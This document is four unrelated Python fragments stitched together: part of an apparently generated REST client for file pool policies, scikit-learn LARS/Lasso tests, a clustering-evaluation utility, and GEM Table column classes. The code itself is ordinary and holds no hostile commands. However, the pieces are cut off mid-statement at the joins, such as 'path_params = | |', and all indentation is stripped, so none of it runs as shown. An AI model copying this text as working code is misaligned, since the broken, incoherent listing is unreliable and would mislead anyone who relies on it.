for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_filepool_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filepool_policy' is set
if ('filepool_policy' not in params) or (params['filepool_policy'] is None):
raise ValueError("Missing the required parameter `filepool_policy` when calling `create_filepool_policy`")
resource_path = '/platform/1/filepool/policies'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'filepool_policy' in params:
body_params = params['filepool_policy']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateFilepoolPolicyResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_filepool_policy(self, filepool_policy_id, **kwargs):
"""
Delete file pool policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_filepool_policy(filepool_policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filepool_policy_id: Delete file pool policy. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_policy_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_filepool_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filepool_policy_id' is set
if ('filepool_policy_id' not in params) or (params['filepool_policy_id'] is None):
raise ValueError("Missing the required parameter `filepool_policy_id` when calling `delete_filepool_policy`")
resource_path = '/platform/1/filepool/policies/{FilepoolPolicyId}'.replace('{format}', 'json')
path_params = {}
if 'filepool_policy_id' in params:
path_params['FilepoolPolicyId'] = params['filepool_policy_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_default_policy(self, **kwargs):
"""
List default file pool policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_default_policy(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: FilepoolDefaultPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_default_policy" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/1/filepool/default-policy'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FilepoolDefaultPolicy',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_policy(self, filepool_policy_id, **kwargs):
"""
Retrieve file pool policy information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_policy(filepool_policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filepool_policy_id: Retrieve file pool policy information. (required)
:return: FilepoolPolicies
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_policy_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filepool_policy_id' is set
if ('filepool_policy_id' not in params) or (params['filepool_policy_id'] is None):
raise ValueError("Missing the required parameter `filepool_policy_id` when calling `get_filepool_policy`")
resource_path = '/platform/1/filepool/policies/{FilepoolPolicyId}'.replace('{format}', 'json')
path_params = {}
if 'filepool_policy_id' in params:
path_params['FilepoolPolicyId'] = params['filepool_policy_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FilepoolPolicies',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_template(self, filepool_template_id, **kwargs):
"""
List all templates.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_template(filepool_template_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filepool_template_id: List all templates. (required)
:return: FilepoolTemplates
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_template_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filepool_template_id' is set
if ('filepool_template_id' not in params) or (params['filepool_template_id'] is None):
raise ValueError("Missing the required parameter `filepool_template_id` when calling `get_filepool_template`")
resource_path = '/platform/1/filepool/templates/{FilepoolTemplateId}'.replace('{format}', 'json')
path_params = {}
if 'filepool_template_id' in params:
path_params['FilepoolTemplateId'] = params['filepool_template_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FilepoolTemplates',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_filepool_templates(self, **kwargs):
"""
List all templates.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_filepool_templates(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: FilepoolTemplates
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_filepool_templates" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/1/filepool/templates'.replace('{format}', 'json')
path_params = | |
# Create an ill-conditioned situation in which the LARS has to go
# far in the path to converge, and check that LARS and coordinate
# descent give the same answers
# Note it used to be the case that Lars had to use the drop for good
# strategy for this but this is no longer the case with the
# equality_tolerance checks
X = [[1e20, 1e20, 0],
[-1e-32, 0, 0],
[1, 1, 1]]
y = [10, 10, 1]
alpha = .0001
def objective_function(coef):
return (1. / (2. * len(X)) * linalg.norm(y - np.dot(X, coef)) ** 2
+ alpha * linalg.norm(coef, 1))
lars = linear_model.LassoLars(alpha=alpha, normalize=False)
assert_warns(ConvergenceWarning, lars.fit, X, y)
lars_coef_ = lars.coef_
lars_obj = objective_function(lars_coef_)
coord_descent = linear_model.Lasso(alpha=alpha, tol=1e-4, normalize=False)
cd_coef_ = coord_descent.fit(X, y).coef_
cd_obj = objective_function(cd_coef_)
assert_less(lars_obj, cd_obj * (1. + 1e-8))
def test_lars_add_features():
# assure that at least some features get added if necessary
# test for 6d2b4c
# Hilbert matrix
n = 5
H = 1. / (np.arange(1, n + 1) + np.arange(n)[:, np.newaxis])
clf = linear_model.Lars(fit_intercept=False).fit(
H, np.arange(n))
assert np.all(np.isfinite(clf.coef_))
def test_lars_n_nonzero_coefs(verbose=False):
lars = linear_model.Lars(n_nonzero_coefs=6, verbose=verbose)
lars.fit(X, y)
assert_equal(len(lars.coef_.nonzero()[0]), 6)
# The path should be of length 6 + 1 in a Lars going down to 6
# non-zero coefs
assert_equal(len(lars.alphas_), 7)
@ignore_warnings
def test_multitarget():
# Assure that estimators receiving multidimensional y do the right thing
Y = np.vstack([y, y ** 2]).T
n_targets = Y.shape[1]
estimators = [
linear_model.LassoLars(),
linear_model.Lars(),
# regression test for gh-1615
linear_model.LassoLars(fit_intercept=False),
linear_model.Lars(fit_intercept=False),
]
for estimator in estimators:
estimator.fit(X, Y)
Y_pred = estimator.predict(X)
alphas, active, coef, path = (estimator.alphas_, estimator.active_,
estimator.coef_, estimator.coef_path_)
for k in range(n_targets):
estimator.fit(X, Y[:, k])
y_pred = estimator.predict(X)
assert_array_almost_equal(alphas[k], estimator.alphas_)
assert_array_almost_equal(active[k], estimator.active_)
assert_array_almost_equal(coef[k], estimator.coef_)
assert_array_almost_equal(path[k], estimator.coef_path_)
assert_array_almost_equal(Y_pred[:, k], y_pred)
@pytest.mark.filterwarnings('ignore: The default value of cv') # 0.22
def test_lars_cv():
# Test the LassoLarsCV object by checking that the optimal alpha
# increases as the number of samples increases.
# This property is not actually guaranteed in general and is just a
# property of the given dataset, with the given steps chosen.
old_alpha = 0
lars_cv = linear_model.LassoLarsCV()
for length in (400, 200, 100):
X = diabetes.data[:length]
y = diabetes.target[:length]
lars_cv.fit(X, y)
np.testing.assert_array_less(old_alpha, lars_cv.alpha_)
old_alpha = lars_cv.alpha_
assert not hasattr(lars_cv, 'n_nonzero_coefs')
@pytest.mark.filterwarnings('ignore::FutureWarning')
def test_lars_cv_max_iter():
with warnings.catch_warnings(record=True) as w:
rng = np.random.RandomState(42)
x = rng.randn(len(y))
X = diabetes.data
X = np.c_[X, x, x] # add correlated features
lars_cv = linear_model.LassoLarsCV(max_iter=5)
lars_cv.fit(X, y)
assert len(w) == 0
def test_lasso_lars_ic():
# Test the LassoLarsIC object by checking that
# - some good features are selected.
# - alpha_bic > alpha_aic
# - n_nonzero_bic < n_nonzero_aic
lars_bic = linear_model.LassoLarsIC('bic')
lars_aic = linear_model.LassoLarsIC('aic')
rng = np.random.RandomState(42)
X = diabetes.data
X = np.c_[X, rng.randn(X.shape[0], 5)] # add 5 bad features
lars_bic.fit(X, y)
lars_aic.fit(X, y)
nonzero_bic = np.where(lars_bic.coef_)[0]
nonzero_aic = np.where(lars_aic.coef_)[0]
assert_greater(lars_bic.alpha_, lars_aic.alpha_)
assert_less(len(nonzero_bic), len(nonzero_aic))
assert_less(np.max(nonzero_bic), diabetes.data.shape[1])
# test error on unknown IC
lars_broken = linear_model.LassoLarsIC('<unknown>')
assert_raises(ValueError, lars_broken.fit, X, y)
def test_lars_path_readonly_data():
# When using automated memory mapping on large input, the
# fold data is in read-only mode
# This is a non-regression test for:
# https://github.com/scikit-learn/scikit-learn/issues/4597
splitted_data = train_test_split(X, y, random_state=42)
with TempMemmap(splitted_data) as (X_train, X_test, y_train, y_test):
# The following should not fail despite copy=False
_lars_path_residues(X_train, y_train, X_test, y_test, copy=False)
@pytest.mark.filterwarnings('ignore: The default of the `iid`') # 0.22
def test_lars_path_positive_constraint():
# this is the main test for the positive parameter on the lars_path method
# the estimator classes just make use of this function
# we do the test on the diabetes dataset
# ensure that we get negative coefficients when positive=False
# and all positive when positive=True
# for method 'lar' (default) and lasso
# Once deprecation of LAR + positive option is done use these:
# assert_raises(ValueError, linear_model.lars_path, diabetes['data'],
# diabetes['target'], method='lar', positive=True)
with pytest.warns(DeprecationWarning, match='broken'):
linear_model.lars_path(diabetes['data'], diabetes['target'],
return_path=True, method='lar',
positive=True)
method = 'lasso'
_, _, coefs = \
linear_model.lars_path(X, y, return_path=True, method=method,
positive=False)
assert coefs.min() < 0
_, _, coefs = \
linear_model.lars_path(X, y, return_path=True, method=method,
positive=True)
assert coefs.min() >= 0
# now we gonna test the positive option for all estimator classes
default_parameter = {'fit_intercept': False}
estimator_parameter_map = {'LassoLars': {'alpha': 0.1},
'LassoLarsCV': {},
'LassoLarsIC': {}}
@pytest.mark.filterwarnings('ignore: The default value of cv') # 0.22
def test_estimatorclasses_positive_constraint():
# testing the transmissibility for the positive option of all estimator
# classes in this same function here
default_parameter = {'fit_intercept': False}
estimator_parameter_map = {'LassoLars': {'alpha': 0.1},
'LassoLarsCV': {},
'LassoLarsIC': {}}
for estname in estimator_parameter_map:
params = default_parameter.copy()
params.update(estimator_parameter_map[estname])
estimator = getattr(linear_model, estname)(positive=False, **params)
estimator.fit(X, y)
assert estimator.coef_.min() < 0
estimator = getattr(linear_model, estname)(positive=True, **params)
estimator.fit(X, y)
assert min(estimator.coef_) >= 0
def test_lasso_lars_vs_lasso_cd_positive():
# Test that LassoLars and Lasso using coordinate descent give the
# same results when using the positive option
# This test is basically a copy of the above with additional positive
# option. However for the middle part, the comparison of coefficient values
# for a range of alphas, we had to make an adaptations. See below.
# not normalized data
X = 3 * diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
positive=True)
lasso_cd = linear_model.Lasso(fit_intercept=False, tol=1e-8, positive=True)
for c, a in zip(lasso_path.T, alphas):
if a == 0:
continue
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
# The range of alphas chosen for coefficient comparison here is restricted
# as compared with the above test without the positive option. This is due
# to the circumstance that the Lars-Lasso algorithm does not converge to
# the least-squares-solution for small alphas, see 'Least Angle Regression'
# by Efron et al 2004. The coefficients are typically in congruence up to
# the smallest alpha reached by the Lars-Lasso algorithm and start to
# diverge thereafter. See
# https://gist.github.com/michigraber/7e7d7c75eca694c7a6ff
for alpha in np.linspace(6e-1, 1 - 1e-2, 20):
clf1 = linear_model.LassoLars(fit_intercept=False, alpha=alpha,
normalize=False, positive=True).fit(X, y)
clf2 = linear_model.Lasso(fit_intercept=False, alpha=alpha, tol=1e-8,
normalize=False, positive=True).fit(X, y)
err = linalg.norm(clf1.coef_ - clf2.coef_)
assert_less(err, 1e-3)
# normalized data
X = diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
positive=True)
lasso_cd = linear_model.Lasso(fit_intercept=False, normalize=True,
tol=1e-8, positive=True)
for c, a in zip(lasso_path.T[:-1], alphas[:-1]): # don't include alpha=0
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
def test_lasso_lars_vs_R_implementation():
# Test that sklearn LassoLars implementation agrees with the LassoLars
# implementation available in R (lars library) under the following
# scenarios:
# 1) fit_intercept=False and normalize=False
# 2) fit_intercept=True and normalize=True
# Let's generate the data used in the bug report 7778
y = np.array([-6.45006793, -3.51251449, -8.52445396, 6.12277822,
-19.42109366])
x = np.array([[0.47299829, 0, 0, 0, 0],
[0.08239882, 0.85784863, 0, 0, 0],
[0.30114139, -0.07501577, 0.80895216, 0, 0],
[-0.01460346, -0.1015233, 0.0407278, 0.80338378, 0],
[-0.69363927, 0.06754067, 0.18064514, -0.0803561,
0.40427291]])
X = x.T
###########################################################################
# Scenario 1: Let's compare R vs sklearn when fit_intercept=False and
# normalize=False
###########################################################################
#
# The R result was obtained using the following code:
#
# library(lars)
# model_lasso_lars = lars(X, t(y), type="lasso", intercept=FALSE,
# trace=TRUE, normalize=FALSE)
# r = t(model_lasso_lars$beta)
#
r = np.array([[0, 0, 0, 0, 0, -79.810362809499026, -83.528788732782829,
-83.777653739190711, -83.784156932888934,
-84.033390591756657],
[0, 0, 0, 0, -0.476624256777266, 0, 0, 0, 0,
0.025219751009936],
[0, -3.577397088285891, -4.702795355871871,
-7.016748621359461, -7.614898471899412, -0.336938391359179,
0, 0, 0.001213370600853, 0.048162321585148],
[0, 0, 0, 2.231558436628169, 2.723267514525966,
2.811549786389614, 2.813766976061531, 2.817462468949557,
2.817368178703816, 2.816221090636795],
[0, 0, -1.218422599914637, -3.457726183014808,
-4.021304522060710, -45.827461592423745,
-47.776608869312305,
-47.911561610746404, -47.914845922736234,
-48.039562334265717]])
model_lasso_lars = linear_model.LassoLars(alpha=0, fit_intercept=False,
normalize=False)
model_lasso_lars.fit(X, y)
skl_betas = model_lasso_lars.coef_path_
assert_array_almost_equal(r, skl_betas, decimal=12)
###########################################################################
###########################################################################
# Scenario 2: Let's compare R vs sklearn when fit_intercept=True and
# normalize=True
#
# Note: When normalize is equal to True, R returns the coefficients in
# their original units, that is, they are rescaled back, whereas sklearn
# does not do that, therefore, we need to do this step before comparing
# their results.
###########################################################################
#
# The R result was obtained using the following code:
#
# library(lars)
# model_lasso_lars2 = lars(X, t(y), type="lasso", intercept=TRUE,
# trace=TRUE, normalize=TRUE)
# r2 = t(model_lasso_lars2$beta)
r2 = np.array([[0, 0, 0, 0, 0],
[0, 0, 0, 8.371887668009453, 19.463768371044026],
[0, 0, | |
from eagles.Unsupervised.utils import plot_utils as pu
from eagles.Unsupervised.utils import cluster_eval_utils as ceu
from eagles.Unsupervised.utils import logger_utils as lu
import numpy as np
import pandas as pd
from IPython.display import display
from sklearn.cluster import KMeans, AgglomerativeClustering, DBSCAN
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.metrics import silhouette_score
from kneed import KneeLocator
import logging
logger = logging.getLogger(__name__)
pd.set_option("display.max_rows", None)
pd.set_option("display.max_columns", None)
pd.set_option("display.width", None)
pd.set_option("display.max_colwidth", None)
def _find_max_sil(res_dict):
max_ind = res_dict["scores"].argmax()
num_clusters = res_dict["n_clusters"][max_ind]
max_sil_score = res_dict["scores"][max_ind]
return num_clusters, max_sil_score
def _init_method(model=None, params={}):
if model is None:
logger.warning("No model passed in")
return
if model == "kmeans":
mod = KMeans(**params)
elif model == "agglomerativeclustering":
mod = AgglomerativeClustering(**params)
elif model == "dbscan":
mod = DBSCAN(**params)
else:
mod = model
return mod
def find_optimal_clusters(
data=None,
ft_cols=[],
cluster_method="kmeans",
metric="max_sil",
min_num_clusters=2,
max_num_clusters=10,
params={},
scale=None,
plot_dims=[],
summary_stats=[],
run_stat_comps=True,
plot_scale=None,
random_seed=None,
log="log",
log_name=None,
log_path=None,
log_note=None,
):
"""
Takes in data and model and fits specified unsupervised model to the data. Then uses the specified metric to find
the optimal number of clusters. The optimal number of clusters is passed to eval_clusters to evaluate the
clusters for differences
:param data: default None, expects pandas dataframe with names columns
:param ft_cols: default empty list: expects list containing string names of the columns to use for clustering.
If default then uses all cols
:param cluster_method: default "kmeans", expects string name of the model to be applied (i.e. kmeans,
agglomerativeclustering, dbscan
:param metric: default "max_sil", expects string for metric to determine the optimal number of clusters
:param min_num_clusters: default 2, int specifying the lower bound of the number clusters
:param max_num_clusters: default 10, int specifyuing the upper bound of the number clusters
:param params: default empty dict, paramter dictionary for the model being tested
:param scale: default None, expects either "minmax", "standard" or sklearn scaler object
:param plot_dims: default empty list, expects list of dimensions to plot the result clusters across
:param summary_stats: default empty list, expects list of grouping statistics to apply to data \
during cluster comparisons
:param run_stat_comps: default True, boolean indicating whether or not to run cluster comparisons
:param plot_scale: default None, expects either "minmax" or "standard" to indicate scaling of features for plots
:param random_seed: default None, int specifying the random seed value for the analysis
:param log: string or list default None, Expects either a string ("log", "data", "mod") or a list containing these
keywords to tell the logger what to log. Note when a list is passed in the function will create a directory to store
the logged out components.
:param log_name: str default None, prefix name of logged out data. Ignored if log is None
:param log_path: str default None, path to save log data to. Ignored if no log is None
:param log_note: str default None, Note to be used in the log that is saved out. Ignored if no log
:return: returns pandas df with attached cluster labels
"""
if min_num_clusters == max_num_clusters:
logger.warning("WARNING MIN AND MAX NUM CLUSTERS SHOULD NOT BE EQUAL")
return
if random_seed is None:
random_seed = np.random.randint(1000, size=1)[0]
print("Random Seed Value: " + str(random_seed))
if len(ft_cols) == 0:
ft_cols = [col for col in data.columns]
data = data[ft_cols].copy(deep=True)
if scale:
if scale == "standard":
scaler = StandardScaler()
data = scaler.fit_transform(data[ft_cols])
elif scale == "minmax":
scaler = MinMaxScaler()
data = scaler.fit_transform(data[ft_cols])
else:
data = scale.fit_transfrom(data)
data = pd.DataFrame(data)
data.columns = ft_cols
# if kmeans of agglom loop through to find the optimal clusters
if cluster_method in ["kmeans", "agglomerativeclustering"]:
res_dict = {"n_clusters": np.array([]), "scores": np.array([])}
# loop through the number of clusters and create dictionary of num clusters with metrics
for i in range(min_num_clusters, max_num_clusters, 1):
params["n_clusters"] = i
res_dict["n_clusters"] = np.append(res_dict["n_clusters"], i)
model = _init_method(model=cluster_method, params=params)
pred_labels = model.fit_predict(data[ft_cols])
if metric in ["max_sil"]:
res_dict["scores"] = np.append(
res_dict["scores"], silhouette_score(data, pred_labels)
)
elif metric == "knee_wss":
res_dict["scores"] = np.append(res_dict["scores"], model.inertia_)
else:
logger.warning("WARNING METRIC NOT SUPPORTED")
return
print("Finished fitting model with " + str(i) + " clusters", end="\r")
print("", end="\n")
elif cluster_method in ["dbscan"]:
model = _init_method(model=cluster_method, params=params)
model.fit_predict(data[ft_cols])
else:
logger.warning("Non supported model passed in")
return
# Once looped through and found the scores across the range of clusters then get final set based on the best score
if cluster_method in ["kmeans", "agglomerativeclustering"]:
if metric == "max_sil":
opt_n_clusters, max_sil_score = _find_max_sil(res_dict=res_dict)
opt_n_clusters = int(opt_n_clusters)
print("Best silhoutte score: " + str(max_sil_score))
elif metric == "knee_wss":
kn = KneeLocator(
x=res_dict["n_clusters"],
y=res_dict["scores"],
curve="convex",
direction="decreasing",
)
opt_n_clusters = int(kn.knee)
pu.plot_score_curve(data=res_dict, metric=metric, opt_n_clusters=opt_n_clusters)
elif cluster_method in ["dbscan"]:
opt_n_clusters = len(set(model.labels_)) - (1 if -1 in model.labels_ else 0)
print("Optimal number of clusters: " + str(opt_n_clusters) + "\n")
eval_clusters(
data=data,
n_clusters=opt_n_clusters,
method=cluster_method,
params=params,
ft_cols=ft_cols,
plot_dims=plot_dims,
summary_stats=summary_stats,
run_stat_comps=run_stat_comps,
plot_scale=plot_scale,
log=log,
log_name=log_name,
log_path=log_path,
log_note=log_note,
)
return data
def eval_clusters(
data=None,
ft_cols=[],
n_clusters=2,
method="kmeans",
params={},
scale=None,
plot_dims=[],
summary_stats=[],
run_stat_comps=True,
plot_scale=None,
log="log",
log_name=None,
log_path=None,
log_note=None,
):
"""
Function to find and compare clusters across specified dimensions
:param data: default None, expects pandas dataframe with names columns
:param ft_cols: default empty list: expects list containing string names of the columns to use for clustering.
:param n_clusters: default 2, int specifying the number of desired clusters
:param method: default "kmeans", expects string name of the model to be applied (i.e. kmeans,
agglomerativeclustering, dbscan
:param params: default empty dict, paramter dictionary for the model being used
:param scale: default None, expects either "minmax", "standard" or sklearn scaler object
:param plot_dims: default empty list, expects list of dimensions to plot the result clusters across
:param summary_stats: default empty list, expects list of grouping statistics to apply to data \
during cluster comparisons
:param run_stat_comps: default True, boolean indicating whether or not to run cluster comparisons
:param plot_scale: default None, expects either "minmax" or "standard" to indicate scaling of features for plots
:param log: string or list default None, Expects either a string ("log", "data", "mod") or a list containing these
keywords to tell the logger what to log. Note when a list is passed in the function will create a directory to store
the logged out components.
:param log_name: str default None, prefix name of logged out data. Ignored if log is None
:param log_path: str default None, path to save log data to. Ignored if no log is None
:param log_note: str default None, Note to be used in the log that is saved out. Ignored if no log
:return: returns pandas df with attached cluster labels
"""
if len(ft_cols) == 0:
ft_cols = [col for col in data.columns]
data = data[ft_cols].copy(deep=True)
if scale:
if scale == "standard":
scaler = StandardScaler()
data = scaler.fit_transform(data[ft_cols])
elif scale == "minmax":
scaler = MinMaxScaler()
data = scaler.fit_transform(data[ft_cols])
else:
data = scale.fit_transfrom(data)
data = pd.DataFrame(data)
data.columns = ft_cols
if (
method in ["kmeans", "agglomerativeclustering"]
and "n_cluster" not in params.keys()
):
params["n_clusters"] = n_clusters
model = _init_method(model=method, params=params)
pred_labels = model.fit_predict(data[ft_cols])
data["Cluster"] = model.labels_
data["Cluster"] = data["Cluster"].astype(str)
sil_score = silhouette_score(data, pred_labels)
print("Silhouette Score: " + str(round(sil_score, 2)))
if type(model).__name__ == "Pipeline":
if type(model.named_steps["model"]).__name__ == "KMeans":
print(
"WSS Total: "
+ str(round(model.named_steps["model"].inertia_, 2))
+ "\n"
)
elif method == "kmeans":
print("WSS Total: " + str(round(model.inertia_, 2)) + "\n")
if len(plot_dims) == 0:
plot_dims = ft_cols + ["Cluster"]
print("Number of Observations per Cluster")
print(str(data["Cluster"].value_counts()) + "\n\n")
base_cluster_stats = ceu.create_summary_table(
data=data, plot_dims=plot_dims, summary_stats=summary_stats
)
base_cluster_stats = round(base_cluster_stats, 2)
print("Base Cluster Stats \n")
display(base_cluster_stats.T)
print("\n\n")
if run_stat_comps:
sig_test_results, post_hoc_comps = ceu.run_cluster_comps(
data=data, ft_cols=ft_cols
)
if sig_test_results.shape[0] == 0:
print("No significant differences found between clusters")
else:
print("Significance Testing Results \n")
print(str(round(sig_test_results, 2)) + "\n\n")
if post_hoc_comps.shape[0] == 0:
print("No pairwise significant difference")
else:
print("Pairwise Differences \n")
print(str(round(post_hoc_comps, 2)) + "\n\n")
pu.plot_mean_cluster_scores(data=data, plot_scale=plot_scale)
pu.plot_ft_relationships(data=data, plot_dims=plot_dims)
if log:
log_data = {
"n_clusters": n_clusters,
"features": ft_cols,
"Silhouette Score": round(sil_score, 2),
"data": data,
"params": model.get_params(),
"base_cluster_stats": round(base_cluster_stats, 2),
}
if type(model).__name__ == "Pipeline":
log_data["method"] = type(model).__name__
pipe_steps = "Pipe steps: "
for k in model.named_steps.keys():
pipe_steps = pipe_steps + type(model.named_steps[k]).__name__ + " "
log_data["pipe_steps"] = pipe_steps
else:
log_data["method"] = type(model).__name__
if type(model).__name__ == "Pipeline":
if type(model.named_steps["model"]).__name__ == "KMeans":
log_data["WSS"] = round(model.named_steps["model"].inertia_, 2)
elif | |
"""Column definitions for GEM Tables."""
from typing import Type, Optional, List, Union
from abc import abstractmethod
from gemd.enumeration.base_enumeration import BaseEnumeration
from citrine._serialization.serializable import Serializable
from citrine._serialization.polymorphic_serializable import PolymorphicSerializable
from citrine._serialization import properties
from citrine.gemtables.variables import Variable
class CompositionSortOrder(BaseEnumeration):
"""[ALPHA] Order to use when sorting the components in a composition.
* ``ALPHABETICAL`` is alpha-numeric order by the component name
* ``QUANTITY`` is ordered from the largest to smallest quantity, with ties
broken alphabetically
"""
ALPHABETICAL = "alphabetical"
QUANTITY = "quantity"
class ChemicalDisplayFormat(BaseEnumeration):
"""[ALPHA] Format to use when rendering a molecular structure.
* ``SMILES`` Simplified molecular-input line-entry system
* ``INCHI`` International Chemical Identifier
"""
SMILES = "smiles"
INCHI = "inchi"
def _make_data_source(variable_rep: Union[str, Variable]) -> str:
"""Return a string appropriate to use as a data_source.
Parameters
----------
variable_rep: Union[str, Variable]
Either the name of the variable or the variable itself
"""
if isinstance(variable_rep, str):
return variable_rep
elif isinstance(variable_rep, Variable):
return variable_rep.name
else:
raise TypeError("Columns can only be linked by str or Variable."
"Instead got {}.".format(variable_rep))
class Column(PolymorphicSerializable['Column']):
"""[ALPHA] A column in the GEM Table, defined as some operation on a variable.
Abstract type that returns the proper type given a serialized dict.
"""
@abstractmethod
def _attrs(self) -> List[str]:
pass # pragma: no cover
def __eq__(self, other):
try:
return all([
self.__getattribute__(key) == other.__getattribute__(key) for key in self._attrs()
])
except AttributeError:
return False
@classmethod
def get_type(cls, data) -> Type[Serializable]:
"""Return the subtype."""
if "type" not in data:
raise ValueError("Can only get types from dicts with a 'type' key")
types: List[Type[Serializable]] = [
IdentityColumn,
MeanColumn, StdDevColumn, QuantileColumn, OriginalUnitsColumn,
MostLikelyCategoryColumn, MostLikelyProbabilityColumn,
FlatCompositionColumn, ComponentQuantityColumn,
NthBiggestComponentNameColumn, NthBiggestComponentQuantityColumn,
MolecularStructureColumn, ConcatColumn
]
res = next((x for x in types if x.typ == data["type"]), None)
if res is None:
raise ValueError("Unrecognized type: {}".format(data["type"]))
return res
class MeanColumn(Serializable['MeanColumn'], Column):
"""[ALPHA] Column containing the mean of a real-valued variable.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
target_units: Optional[str]
units to convert the real variable into
"""
data_source = properties.String('data_source')
target_units = properties.Optional(properties.String, "target_units")
typ = properties.String('type', default="mean_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "target_units", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
target_units: Optional[str] = None):
self.data_source = _make_data_source(data_source)
self.target_units = target_units
